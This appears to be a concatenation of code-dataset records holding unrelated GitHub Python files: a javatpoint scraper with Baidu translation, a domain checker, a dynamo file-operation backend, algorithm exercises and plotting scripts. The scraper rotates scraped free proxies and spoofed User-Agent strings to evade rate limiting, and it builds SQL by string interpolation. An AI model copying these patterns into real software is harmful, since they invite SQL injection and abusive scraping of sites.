jsons['data'][0]['dst']\n except Exception as e:\n print(e)\n print('\\033[1;31m' + '开始重新尝试语句翻译:' + '\\033[0m' + word)\n count += 1\n return word\n # translate(word, count)\n else:\n return word\n\n\n# 文本翻译控制\ndef translate_handler(string, name):\n end = 0\n while string.find('<' + name + '>', end) != -1:\n start = string.find('<' + name + '>')\n end = string.find('')\n word = string[start + 3:end]\n trans_word = translate(word, 0)\n string = string[:start + 4] + trans_word + string[end:]\n # print(string)\n return string\n\n\n# 随机获取代理ip-----------------------------------------------------------------------------------------------\ndef getproxyip(ip_file):\n fo = open(ip_file, 'r')\n proxys = fo.read().split('\\n')\n proxy = ast.literal_eval(random.choice(proxys))\n print(proxy)\n fo.close()\n return proxy\n pass\n\n\n# 随机获取headers头信息\ndef getheaders():\n user_agents = [\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',\n 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',\n 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',\n 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',\n \"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.7 (KHTML, like Gecko) Ubuntu/11.04 Chromium/16.0.912.77 Chrome/16.0.912.77 Safari/535.7\",\n \"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:10.0) Gecko/20100101 Firefox/10.0 \"]\n user_agent = random.choice(user_agents)\n print(user_agent)\n headers = {\n 'User-Agent': user_agent,\n 'Accept-Encoding': 'gzip'}\n return headers\n\n\n# 获取网页主体内容\ndef getHTML(pageAddress, count):\n print(\"读取当前网址内容:\" + pageAddress)\n if count <= 6:\n socket.setdefaulttimeout(20) # 设置全局超时时间\n try:\n proxy_support = urllib.request.ProxyHandler(getproxyip('proxy_ip_javatpoint.txt'))\n opener = urllib.request.build_opener(proxy_support)\n opener.addheaders = [getheaders()]\n urllib.request.install_opener(opener)\n res = urllib.request.urlopen(pageAddress).read()\n # req = requests.get(url=pageAddress, headers=getheaders())\n # res = req.text\n # 创建一个BeautifulSoup解析对象\n soup = BeautifulSoup(res, \"html.parser\")\n # 获取\n contents = soup.select('div#city')\n nextName = soup.select('a.next')[0]['href']\n fileName = pageAddress[pageAddress.rindex('/') + 1:]\n # 图片提取拼接?\n # images = soup.select('div#city > img')\n # 分类信息处理\n # classify_page = soup.select('#link > div > ul > a')\n # print(classify_page)\n # if len(classify_page) >= 1 :\n # classify = classify_page[0].get_text()\n classify = 'python'\n print('解析网页,获得网页主体内容:' + fileName)\n content = \"\".join('%s' % id for id in contents)\n # 获取网页主要信息传输并进行处理\n page_info = [fileName, nextName, content, classify]\n content_handler(page_info)\n # 下一个网页递归\n nextPage(nextName)\n except Exception as e:\n print(e)\n print('\\033[1;31m' + '开始重新尝试第' + str(count + 1) + '次网页连接' + '\\033[0m')\n count += 1\n getHTML(pageAddress, count)\n else:\n proxy_ip = open('proxy_ip_javatpoint.txt', 'w') # 清空储存有效IP的文档\n proxy_ip.close() # 关闭文件\n print(\"重新抓取生成ip地址\")\n get_proxyip()\n # 利用新代理重新进行网页爬取\n getHTML(pageAddress, 0)\n\n\n# 寻找下一个网页\ndef nextPage(nextName):\n pageAddress = 'https://www.javatpoint.com/' + nextName\n getHTML(pageAddress, 0)\n\n\n# 爬虫存储网页\ndef spider_file():\n pass\n\n\n# spider控制\ndef spider_handle():\n pass\n\n\n# 数据库控制\ndef sql_handler(item):\n if sql_repeat(item[0]):\n next_title = item[4]\n classify = item[5]\n update_time = time.strftime(\"%Y-%m-%d\", time.localtime())\n replacesql = \"REPLACE INTO `t_javatpoint_test` \" \\\n \"(`title`, `url`, `english_content`, `translate_content`, `next_title`, `classify`, `update_time`) \" \\\n \"VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s')\" \\\n % (item[0], item[1], item[2], item[3], next_title, classify, update_time)\n # print(replacesql)\n baseoperation(replacesql)\n else:\n print('\\033[1;31m' + '数据库中已有相同标题记录' + '\\033[0m')\n\n\n# 网页内容每行的原始处理处理\ndef content_row(row):\n # 去除注释\n while row.find('') + 3:]\n # div标签去除\n row = tags(row, 'div')\n # ss = tags(ss, 'table')\n # ss = tags(ss, 'tr')\n # ss = tags(ss, 'td')\n row = tags(row, 'strong')\n row = tags(row, 'b')\n row = tags(row, 'B')\n row = tag(row, 'br')\n row = remove_attribute(row, 'h1')\n row = remove_attribute(row, 'h2')\n row = remove_attribute(row, 'h3')\n row = remove_attribute(row, 'h4')\n row = remove_attribute(row, 'h5')\n row = remove_attribute(row, 'a')\n row = remove_attribute(row, 'span')\n row = remove_attribute(row, 'table')\n row = remove_attribute(row, 'tr')\n row = remove_attribute(row, 'td')\n # 去除' \" 方便存入\n row = row.replace('\\'', '\\\\\\'')\n row = row.replace('\\\"', '\\\\\\\"')\n # 翻译\n # ss = translate_handler(ss, 'p')\n trans_row = translate_handler(row, 'h2')\n trans_row = translate_handler(trans_row, 'p')\n return [row, trans_row]\n\n\n# 网页内容整体的处理\ndef content_handler(content_info):\n filename = content_info[0]\n nextfilename = content_info[1]\n page_content = content_info[2]\n classify = content_info[3]\n new_content = []\n new_content_trans = []\n item = []\n content_rows = page_content.split('\\n')\n for row in content_rows:\n rows = content_row(row)\n if len(rows[0]) >= 1:\n new_content.append(rows[0])\n new_content_trans.append(rows[1])\n content = \"\".join(new_content)\n contetn_trans = \"\".join(new_content_trans)\n print(\"网页主体处理后字节长度:\" + str(len(content)))\n url = 'https://www.javatpoint.com/' + filename\n item.append(filename)\n item.append(url)\n item.append(content)\n item.append(contetn_trans)\n item.append(nextfilename)\n item.append(classify)\n print('网页信息处理结束,开始导入到数据库')\n sql_handler(item)\n\n\n# 为线程定义一个函数\ndef print_time(threadName, delay):\n count = 0\n while count < 5:\n time.sleep(delay)\n count += 1\n print(\"%s: %s\" % (threadName, time.ctime(time.time())))\n\n\n# 多线程控制\ndef thread_handler():\n # 创建两个线程\n count = 0\n try:\n if count < 5:\n threading.Lock().acquire()\n _thread.start_new_thread(print_time, (\"Thread-1\", 2,))\n threading.Lock().release()\n _thread.start_new_thread(print_time, (\"Thread-2\", 4,))\n\n except:\n print(\"Error: 无法启动线程\")\n while 1:\n pass\n\n\n# 代理IP地址文件的生成\ndef get_proxyip():\n # 抓取代理IP\n ip_totle = []\n for page in range(2, 12):\n # url = 'http://ip84.com/dlgn/' + str(page)\n url = 'https://www.xicidaili.com/wn/' + str(page) # 西刺代理\n headers = {'Accept-Encoding': 'gzip',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}\n req = requests.get(url=url, headers=headers)\n content = req.text\n print('获得代理ip页数:', page)\n pattern = re.compile('(\\d.*?)') # 截取与之间第一个数为数字的内容\n ip_page = re.findall(pattern, str(content))\n ip_totle.extend(ip_page)\n time.sleep(random.choice(range(1, 3)))\n\n # 整理代理IP格式\n proxys = []\n for i in range(0, len(ip_totle), 4):\n proxy_host = ip_totle[i] + ':' + ip_totle[i + 1]\n proxy_temp = {\"https\": proxy_host}\n proxys.append(proxy_temp)\n print(proxys)\n # 多线程验证\n threads = []\n for i in range(len(proxys)):\n thread = threading.Thread(target=test, args=(proxys, i))\n threads.append(thread)\n thread.start()\n # 阻塞主进程,等待所有子线程结束\n for thread in threads:\n thread.join()\n\n\n# 验证代理IP有效性的方法\ndef test(proxys, i):\n lock = threading.Lock() # 建立一个锁\n socket.setdefaulttimeout(10) # 设置全局超时时间\n url = \"https://www.javatpoint.com\" # 打算爬取的网址 https://fanyi.baidu.com/transapi https://www.javatpoint.com\n try:\n proxy_support = urllib.request.ProxyHandler(proxys[i])\n opener = urllib.request.build_opener(proxy_support)\n opener.addheaders = [(\"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; WOW64)\")]\n urllib.request.install_opener(opener)\n res = urllib.request.urlopen(url).read()\n lock.acquire() # 获得锁\n print(proxys[i], 'is OK')\n proxy_ip = open('proxy_ip_javatpoint.txt', 'a') # 新建一个储存有效IP的文档\n proxy_ip.write('%s\\n' % str(proxys[i])) # 写入该代理IP\n proxy_ip.close() # 关闭文件\n lock.release() # 释放锁\n except Exception as e:\n lock.acquire()\n print(proxys[i], e)\n lock.release()\n\n\nif __name__ == '__main__':\n targe = 'https://www.javatpoint.com/numpy-string-functions'\n getHTML(targe, 0)\n # thread_handler()\n","repo_name":"iwangchuanli/Project-experience","sub_path":"python/python-百度翻译调用/Baidu_translate/com/translate/baidu/javaTpoint.py","file_name":"javaTpoint.py","file_ext":"py","file_size_in_byte":13913,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"21"} +{"seq_id":"6637750164","text":"from domainFinder import DomainFinder\n\nextension = \".com\"\n\nfreeWebsites = []\n\nwith open('words.txt') as f, open('taken.txt', \"a+\", buffering=1) as taken, open('free.txt', \"a+\", buffering=1) as free:\n # try:\n words = [line.rstrip() for line in f]\n taken.seek(0)\n free.seek(0)\n takenDomains = [line.rstrip() for line in taken]\n freedomains = [line.rstrip() for line in free]\n print(takenDomains)\n print(freedomains)\n for firstWord in words:\n if firstWord.startswith('-'):\n continue\n for secondWord in words:\n if not secondWord.endswith(\"-\"):\n name = firstWord.replace(\"\\n\", \"\").replace(\"-\", \"\") + secondWord.replace('\\n', \"\").replace(\"-\",\n \"\") + extension\n\n if name not in takenDomains and name not in freedomains:\n print(name)\n if not DomainFinder.domainExsit(name):\n print(name)\n if DomainFinder.ensureFreeDomain(name):\n free.write(name + \"\\n\")\n freeWebsites.append(name)\n else:\n taken.write(name + \"\\n\")\n else:\n taken.write(name + \"\\n\")\n# except Exception as e:\n# print(e)\n# taken.close()\n# free.close()\n\nprint(freeWebsites)\n","repo_name":"atipezda/findThatDomain","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39349909418","text":"y = [ i for i in range(10) ]\n\nprint(y)\n\n#nested loops\na=1\nb=1\nc= 2\nn=3\n\ny = [ [i,j,k ] for i in range(a+1) for j in range(b+1) for k in range(c+1) ]\n\nz = [ i for i in y if sum(i)!=3]\nprint(y)\nprint('z',z)\n\n\nl1 = ['a', 'b', 'c', 'd', 'e', 'a', 'c']\nl2 = [ x if x in 'abcdef' else 'xx' for x in l1 ]\n\nprint(l2)","repo_name":"salokesh99/practice","sub_path":"list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43579891555","text":"import sys\nimport collections\nimport logging\n\nfrom dynamo.fileop.base import FileQuery\nfrom dynamo.fileop.transfer import FileTransferOperation, FileTransferQuery\nfrom dynamo.fileop.deletion import FileDeletionOperation, FileDeletionQuery\nfrom dynamo.utils.interface.mysql import MySQL\nfrom dynamo.dataformat import File\n\nLOG = logging.getLogger(__name__)\n\nclass StandaloneFileOperation(FileTransferOperation, FileTransferQuery, FileDeletionOperation, FileDeletionQuery):\n \"\"\"\n Interface to in-house transfer & deletion daemon using MySQL for bookkeeping.\n \"\"\"\n\n def __init__(self, config):\n FileTransferOperation.__init__(self, config)\n FileTransferQuery.__init__(self, config)\n FileDeletionOperation.__init__(self, config)\n FileDeletionQuery.__init__(self, config)\n\n self.db = MySQL(config.db_params)\n\n def num_pending_transfers(self): #override\n # FOD can throttle itself.\n return 0\n\n def num_pending_deletions(self): #override\n # FOD can throttle itself.\n return 0\n\n def form_batches(self, tasks): #override\n if len(tasks) == 0:\n return []\n\n if hasattr(tasks[0], 'source'):\n # These are transfer tasks\n by_endpoints = collections.defaultdict(list)\n for task in tasks:\n endpoints = (task.source, task.subscription.destination)\n by_endpoints[endpoints].append(task)\n\n return by_endpoints.values()\n else:\n by_endpoint = collections.defaultdict(list)\n for task in tasks:\n by_endpoint[task.desubscription.site].append(task)\n\n return by_endpoint.values()\n\n def start_transfers(self, batch_id, batch_tasks): #override\n if len(batch_tasks) == 0:\n return {}\n\n result = {}\n\n # tasks should all have the same source and destination\n source = batch_tasks[0].source\n destination = batch_tasks[0].subscription.destination\n\n fields = ('id', 'source', 'destination', 'checksum_algo', 'checksum')\n\n def yield_task_entry():\n for task in batch_tasks:\n lfile = task.subscription.file\n lfn = lfile.lfn\n source_pfn = source.to_pfn(lfn, 'gfal2')\n dest_pfn = destination.to_pfn(lfn, 'gfal2')\n\n if source_pfn is None or dest_pfn is None:\n # either gfal2 is not supported or lfn could not be mapped\n result[task] = False\n continue\n\n if self.checksum_algorithm:\n checksum = (self.checksum_algorithm, str(lfile.checksum[self.checksum_index]))\n else:\n checksum = (None, None)\n\n result[task] = True\n yield (task.id, source_pfn, dest_pfn) + checksum\n\n if not self._read_only:\n sql = 'INSERT INTO `standalone_transfer_batches` (`batch_id`, `source_site`, `destination_site`) VALUES (%s, %s, %s)'\n self.db.query(sql, batch_id, source.name, destination.name)\n self.db.insert_many('standalone_transfer_tasks', fields, None, yield_task_entry())\n\n LOG.debug('Inserted %d entries to standalone_transfer_tasks for batch %d.', len(batch_tasks), batch_id)\n\n return result\n\n def start_deletions(self, batch_id, batch_tasks): #override\n if len(batch_tasks) == 0:\n return {}\n\n result = {}\n\n # tasks should all have the same target site\n site = batch_tasks[0].desubscription.site\n\n fields = ('id', 'file')\n\n def yield_task_entry():\n for task in batch_tasks:\n lfn = task.desubscription.file.lfn\n pfn = site.to_pfn(lfn, 'gfal2')\n\n if pfn is None:\n # either gfal2 is not supported or lfn could not be mapped\n result[task] = False\n continue\n\n result[task] = True\n yield (task.id, pfn)\n\n if not self._read_only:\n sql = 'INSERT INTO `standalone_deletion_batches` (`batch_id`, `site`) VALUES (%s, %s)'\n self.db.query(sql, batch_id, site.name)\n self.db.insert_many('standalone_deletion_tasks', fields, None, yield_task_entry())\n\n LOG.debug('Inserted %d entries to standalone_deletion_tasks for batch %d.', len(batch_tasks), batch_id)\n\n return result\n\n def cancel_transfers(self, task_ids): #override\n return self._cancel(task_ids, 'transfer')\n\n def cancel_deletions(self, task_ids): #override\n return self._cancel(task_ids, 'deletion')\n\n def cleanup(self): #override\n sql = 'DELETE FROM f USING `standalone_transfer_tasks` AS f LEFT JOIN `transfer_tasks` AS t ON t.`id` = f.`id` WHERE t.`id` IS NULL'\n self.db.query(sql)\n sql = 'DELETE FROM f USING `standalone_deletion_tasks` AS f LEFT JOIN `deletion_tasks` AS t ON t.`id` = f.`id` WHERE t.`id` IS NULL'\n self.db.query(sql)\n sql = 'DELETE FROM f USING `standalone_transfer_batches` AS f LEFT JOIN `transfer_batches` AS t ON t.`id` = f.`batch_id` WHERE t.`id` IS NULL'\n self.db.query(sql)\n sql = 'DELETE FROM f USING `standalone_deletion_batches` AS f LEFT JOIN `deletion_batches` AS t ON t.`id` = f.`batch_id` WHERE t.`id` IS NULL'\n self.db.query(sql)\n\n # Delete the source tasks - caution: wipes out all tasks when switching the operation backend\n sql = 'DELETE FROM t USING `transfer_tasks` AS t'\n sql += ' LEFT JOIN `standalone_transfer_tasks` AS f ON f.`id` = t.`id`'\n sql += ' WHERE f.`id` IS NULL'\n self.db.query(sql)\n sql = 'DELETE FROM t USING `deletion_tasks` AS t'\n sql += ' LEFT JOIN `standalone_deletion_tasks` AS f ON f.`id` = t.`id`'\n sql += ' WHERE f.`id` IS NULL'\n self.db.query(sql)\n\n def get_transfer_status(self, batch_id): #override\n return self._get_status(batch_id, 'transfer')\n\n def get_deletion_status(self, batch_id): #override\n return self._get_status(batch_id, 'deletion')\n\n def write_transfer_history(self, history_db, task_id, history_id): #override\n pass\n\n def write_deletion_history(self, history_db, task_id, history_id): #override\n pass\n\n def forget_transfer_status(self, task_id): #override\n return self._forget_status(task_id, 'transfer')\n\n def forget_deletion_status(self, task_id): #override\n return self._forget_status(task_id, 'deletion')\n\n def forget_transfer_batch(self, batch_id): #override\n return self._forget_batch(batch_id, 'transfer')\n\n def forget_deletion_batch(self, batch_id): #override\n return self._forget_batch(batch_id, 'deletion')\n\n def _cancel(self, task_ids, optype):\n sql = 'UPDATE `standalone_{op}_tasks` SET `status` = \\'cancelled\\''.format(op = optype)\n self.db.execute_many(sql, 'id', task_ids, ['`status` IN (\\'new\\', \\'queued\\')'])\n\n def _get_status(self, batch_id, optype):\n sql = 'SELECT q.`id`, a.`status`, a.`exitcode`, a.`message`, UNIX_TIMESTAMP(a.`start_time`), UNIX_TIMESTAMP(a.`finish_time`) FROM `standalone_{op}_tasks` AS a'\n sql += ' INNER JOIN `{op}_tasks` AS q ON q.`id` = a.`id`'\n sql += ' WHERE q.`batch_id` = %s'\n sql = sql.format(op = optype)\n\n return [(i, FileQuery.status_val(s), c, m, t, f) for (i, s, c, m, t, f) in self.db.xquery(sql, batch_id)]\n\n def _forget_status(self, task_id, optype):\n if self._read_only:\n return\n\n sql = 'DELETE FROM `standalone_{op}_tasks` WHERE `id` = %s'.format(op = optype)\n self.db.query(sql, task_id)\n\n def _forget_batch(self, batch_id, optype):\n if self._read_only:\n return\n\n sql = 'DELETE FROM `standalone_{op}_batches` WHERE `batch_id` = %s'\n self.db.query(sql.format(op = optype), batch_id)\n","repo_name":"SmartDataProjects/dynamo","sub_path":"lib/fileop/impl/standalone.py","file_name":"standalone.py","file_ext":"py","file_size_in_byte":7910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32142441862","text":"import csv\n\nendlist = []\nwith open('text.txt') as f:\n lines = f.read().splitlines()\nfor line in lines:\n\tres = line.split()\n\tres = [res[0], res[1], float(res[2])*1.5]\n\tres = [res[0], res[1], str(res[2])]\n\t#print(res)\n\tendlist.append(res)\n#print(endlist)\n\nf = open('margfaldadnut.txt', 'w')\nfor item in endlist:\n\tline = (' ').join(item)\n\ta=line+'\\n'\n\tf.write(a)\nf.close()","repo_name":"siggigauti/Adgerdagreining_Lokaverkefni","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1147820701","text":"# 문제 : https://school.programmers.co.kr/learn/courses/30/lessons/42586?language=python3\n# 시간복잡도 : O^2\n# 개선 : O로 고쳐보자,, (정답이긴 함)\ndef solution(progresses, speeds):\n days = []\n for idx, progress in enumerate(progresses):\n finish_day = (100 - progress) // speeds[idx]\n if progress + (finish_day * speeds[idx]) < 100:\n finish_day += 1\n days.append(finish_day)\n\n answer = []\n cnt = 1\n first = days[0]\n for i in range(1, len(days)):\n if first < days[i]:\n answer.append(cnt)\n first = days[i]\n cnt = 0\n cnt += 1\n answer.append(cnt)\n return answer\n \n\nprint(solution([93, 30, 55], [1, 30, 5]))","repo_name":"julia0926/TIL_Algo","sub_path":"Study/Programmers_lv2/42586_기능개발.py","file_name":"42586_기능개발.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24935466411","text":"class Solution(object):\n def maxAreaOfIsland(self, grid):\n\n\n # Это решение не правильное. Оно для другого случая, оно считает максимальную площадь квадратов.\n # Идем по строкам, и сохраняем результат в одну общую строку(column). Если встречаем 1, прибавляем. Если 0, возвращаем 0 обратно.\n max_area = 0\n column = [0] * len(grid[0])\n\n for k in range(len(grid)):\n area = 0\n\n for i in range(len(grid[0])):\n if grid[k][i] == 1:\n column[i] += 1\n else:\n column[i] = 0\n\n if column[i] == 0:\n max_area = max(max_area, area)\n area = 0\n else:\n area += column[i]\n\n max_area = max(max_area, area)\n\n return max_area\n\n# T -O(R*C)\n# S - O(R*C)\n\n # Правильное решение. Идем по строкам и просматриваем сразу все варианты, вверх вниз, влево, и вправо. Если там единица, идем дальше.\n def maxAreaOfIsland2(self, grid):\n\n max_area = 0\n for k in range(len(grid)):\n for i in range(len(grid[0])):\n if grid[k][i] == 1:\n max_area = max(max_area, self.AreaOfIsland(grid, k, i))\n\n return max_area\n\n\n def AreaOfIsland(self, grid, k ,i):\n\n # Базовые условия чтобы не выйти за границы, и если ячейка равна 1\n if k >= 0 and k < len(grid) and i >= 0 and i < len(grid[0]) and grid[k][i] == 1:\n\n # Модофицируем ячейку, чтобы больше не вызвать рекурсивную функцию\n grid[k][i] = -1\n\n # Возвращаем все варианты вверх вниз влево вправо и прибавляем единицу к сумме площади\n return 1 + self.AreaOfIsland(grid, k - 1, i) + self.AreaOfIsland(grid, k + 1, i) + self.AreaOfIsland(grid, k, i - 1) + self.AreaOfIsland(grid, k, i + 1)\n\n return 0\n\n# T -O(R*C) - тут есть вопросы. Если он счетчик верхней функции прогонит O(R*C) в любом случае. В худщшем случае(когда все 1), рекурсия прогонится только для одного, но по всем, что есть R*C.\n# Дальше в рекурсию он просто не будет заходить, но верхнюю фонкцию то все равно прогонит, хоть и не будет ничего делать с ней.\n# Худший случай. Рекурсия для первого элемента - 1 * R*C. А так же прогнать вхолостую первую функцию - R*C. Получается 1 * R*C + R*C = R*C\n# Возможно R*C + R*C = O(R*C)\n# S - O(R*C) - передаем в стек рекурсии сетку.\n\n\nsol = Solution()\ncandidates = [[1,1],\n [0,1]]\n\n\n\nprint(sol.maxAreaOfIsland2(candidates))\n","repo_name":"beninghton/notGivenUpToG","sub_path":"Arrays/695. Max Area of Island.py","file_name":"695. Max Area of Island.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71866668534","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import rc\nfrom matplotlib import rcParams\n\nrcParams.update({'figure.autolayout': True})\nmpl.rcParams['text.latex.preamble']=[r\"\\usepackage{amssymb}\",\n r\"\\usepackage{amsmath}\",\n r\"\\usepackage{bm}\"]\nplt.rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\n## for Palatino and other serif fonts use:\n#plt.rc('font',**{'family':'serif','serif':['Palatino']})\n#plt.rc('font',**{'family':'serif','serif':['Times New Roman']})\nplt.rc('text', usetex=True);\n#plt.rcParams['savefig.facecolor'] = \"0.8\"\n\nfont_legend = 18;\nfont_fig = 20;\nms_size_1 = 12.0;\nms_size_2 = 12.0;\nms_size_3 = 12.0;\nms_size_4 = 12.0;\nline_size_1 = 2.0;\nline_size_2 = 2.0;\nline_size_3 = 2.0;\nline_size_4 = 2.0;\ntl_font_size = 30;\n\nleg_1 = '--rs';\nleg_2 = '--b>';\nleg_3 = 'rd';\nleg_4 = 'b+';\n\n \ncol_1 = 'r';\ncol_2 = 'b';\ncol_3 = 'r';\ncol_4 = 'b';\n\ncolorAndNodeTypeArray = ['-rs', '-b>', '-go', '-k*', '-c*', '-m*']\n\n#load data from file\noutputFolder_path = 'Result/pic'\nfolder_path = 'Result/ErrorRate'\nfor index in range(1,3):\n\tnumberOfTag = 50 * index\n\tfolder_Name = \"1000_{}_30\".format(numberOfTag)\n\n\tmpl.rcParams.update({'font.size': font_fig})\n\tfig = plt.figure()\n\tax = fig.add_subplot(1,1,1)\n\n\tfor index in range(0,6):\n\t\terrorRate = 10 * index\n\t\tfileName = \"ErrorRateTest_{}\".format(errorRate)\n\t\tfile_path = folder_path + '/' + folder_Name + '/' + fileName + '.txt'\n\t\topen_file = open(file_path, \"r\")\n\t\tx_node = []\n\t\ty_responseTime = []\n\t\tfor line in open_file:\n\t\t\ttempStr = line.split()\n\t\t\tx_node.append(tempStr[0])\n\t\t\ty_responseTime.append(tempStr[1])\n\t\topen_file.close()\n\n\t\t#plt.plot(x_Ratio,y_responseTime) \n\t\tlabelName = \"{}\".format(errorRate)\n\t\t#plt.plot(x_node, y_responseTime, color=colorArray[index], linewidth=1.5, linestyle=\"-\", label=labelName)\n\t\tplt.plot(x_node, y_responseTime, colorAndNodeTypeArray[index], linewidth=line_size_3, ms=ms_size_3, label=labelName)\n\n\t\tplt.legend(loc='upper left', ncol=3)\n\t\tplt.xticks(np.arange(0,900,100))\n\t\t#xlim_Max = 900;\n\t\t#xlim_Min = 0;\n\t\t#plt.xlim(xlim_Min,xlim_Max)\n\t\t# plt.ylim(0,50)\n\t\tplt.ylim(0,30)\n\t\tplt.xlabel(\"Number of Nodes\") \n\t\tplt.ylabel(\"Response Time\") \n\n\t# plt.grid()\n\tax.yaxis.grid(True, linestyle='-', which='major', color='lightgray', alpha=0.5)\n\tpic_filePath = outputFolder_path + '/errorRate_' + str(numberOfTag) + '.png'\n\tplt.savefig(pic_filePath,dpi=300,format=\"png\") \n\tplt.clf()\n\tplt.cla()\n\tplt.close()\n\t#plt.show() \t\t","repo_name":"lukeafang/drawChart","sub_path":"drawResult_ErrorRate.py","file_name":"drawResult_ErrorRate.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19473050188","text":"import os\nimport sys\nimport json\nsys.path.append(\"./DataProcessor/\")\nfrom public import *\n\nTmpDir = \"./data/LCData/\"\n\ndef getAverage(dataset,model):\n\n if dataset == \"bridge_algebra06\":\n dataset_name = \"bridge_algebra06_U_[20,1e9]_P_[F,1e9]_T_[2006-10-05 08-26-16,2007-06-20 13-36-57]_D_T_R_T\"\n elif dataset == \"algebra05\" :\n dataset_name = \"algebra05_U_[20,1e9]_P_[F,1e9]_T_[2005-08-30 09-50-35,2006-06-07 11-12-38]_D_T_R_T\"\n elif(dataset == \"hdu\"):\n dataset_name = \"hdu_U_[30,3600,0.1,T]_P_[30,1e9,F,T]_T_[2018-06-01 00-00-00,2018-11-29 00-00-00]_R_T_D_T\"\n\n if(model == \"AFM\"):\n model_name = \"AFM\"\n file_name = \"results_D_5_K_5_T_0.8_I_300_A_sa.json\"\n elif(model == \"DAS3H\"): \n model_name = \"DAS3H\"\n file_name = \"results_D_5_K_5_T_0.8_I_300_A_uiswat1.json\"\n elif(model == \"DASH\"): \n model_name = \"DASH\"\n file_name = \"results_D_5_K_5_T_0.8_I_300_A_uiwat2.json\"\n elif(model == \"IRT\"): \n model_name = \"IRT\"\n file_name = \"results_D_F_K_5_T_0.8_I_300_A_ui.json\"\n elif(model == \"KTM\"): \n model_name = \"KTM\"\n file_name = \"results_D_5_K_5_T_0.8_I_300_A_iswf.json\"\n elif(model == \"MIRTb\"): \n model_name = \"MIRTb\"\n file_name = \"results_D_5_K_5_T_0.8_I_300_A_ui.json\"\n elif(model == \"PFA\"): \n model_name = \"PFA\"\n file_name = \"results_D_5_K_5_T_0.8_I_300_A_swf.json\"\n\n file_dir = os.path.join(TmpDir,dataset_name+\"/\"+\"das3h/results_KT/\"+model_name+\"/\"+file_name)\n\n\n with open(file_dir, 'r') as f:\n a = json.load(f) #此时a是一个字典对象\n maxfold = 0\n minfold = 1\n results = a[\"results\"]\n fold_0 = results[\"0\"][\"AUC\"]\n fold_1 = results[\"1\"][\"AUC\"]\n fold_2 = results[\"2\"][\"AUC\"]\n fold_3 = results[\"3\"][\"AUC\"]\n fold_4 = results[\"4\"][\"AUC\"]\n average_fold = (fold_0 + fold_1 + fold_2 + fold_3 + fold_4) / 5\n maxfold = max(maxfold,fold_0)\n maxfold = max(maxfold,fold_1)\n maxfold = max(maxfold,fold_2)\n maxfold = max(maxfold,fold_3)\n maxfold = max(maxfold,fold_4)\n minfold = min(minfold,fold_0)\n minfold = min(minfold,fold_1)\n minfold = min(minfold,fold_2)\n minfold = min(minfold,fold_3)\n minfold = min(minfold,fold_4)\n # print(average_fold,maxfold,minfold)\n\n \n if os.path.exists(\"./average_AUC.json\") == False:\n a = {'0':{}}\n average_value_dict = a['0']\n else:\n a = loadDict('./', 'average_AUC.json')\n num = len(a.keys())\n a[str(num)] = {}\n average_value_dict = a[str(num)]\n printDict(average_value_dict)\n average_value_dict[\"dataset\"] = dataset\n average_value_dict[\"model\"] = model\n average_value_dict[\"AUC_average\"] = average_fold\n average_value_dict[\"AUCdiffer_max\"] = maxfold - average_fold\n average_value_dict[\"AUCdiffer_min\"] = average_fold - minfold\n\n saveDict(a, './','average_AUC.json')\n\n\n '''with open(\"./average_AUC.json\",\"a\",encoding='utf8') as f1:\n json.dump(average_value_dict,f1,indent=4,ensure_ascii=False)\n f1.write('\\n')\n #f1.close()\n #print(\"写入文件完成...\")\n '''\n\n'''\n if os.path.exists(\"./average_AUC.json\") == False:\n with open(\"./average_AUC.json\",\"w\",encoding='utf8') as f1:\n json.dump(average_value_dict,f1,indent=4,ensure_ascii=False)\n f1.write('\\n')\n #f1.close()\n #print(\"写入文件完成...\")\n elif os.path.exists(\"./average_AUC.json\"):\n with open(\"./average_AUC.json\",\"a\",encoding='utf8') as f1:\n json.dump(average_value_dict,f1,indent=4,ensure_ascii=False)\n f1.write('\\n')\n #f1.close()\n #print(\"写入文件完成...\")\n'''\n\nif __name__ == \"__main__\":\n getAverage(\"bridge_algebra06\",\"DAS3H\")\n getAverage(\"bridge_algebra06\",\"DASH\")\n getAverage(\"bridge_algebra06\",\"IRT\")\n getAverage(\"bridge_algebra06\",\"MIRTb\")\n getAverage(\"bridge_algebra06\",\"PFA\")\n getAverage(\"bridge_algebra06\",\"KTM\")\n getAverage(\"bridge_algebra06\",\"AFM\")\n\n getAverage(\"algebra05\",\"DAS3H\")\n getAverage(\"algebra05\",\"DASH\")\n getAverage(\"algebra05\",\"IRT\")\n 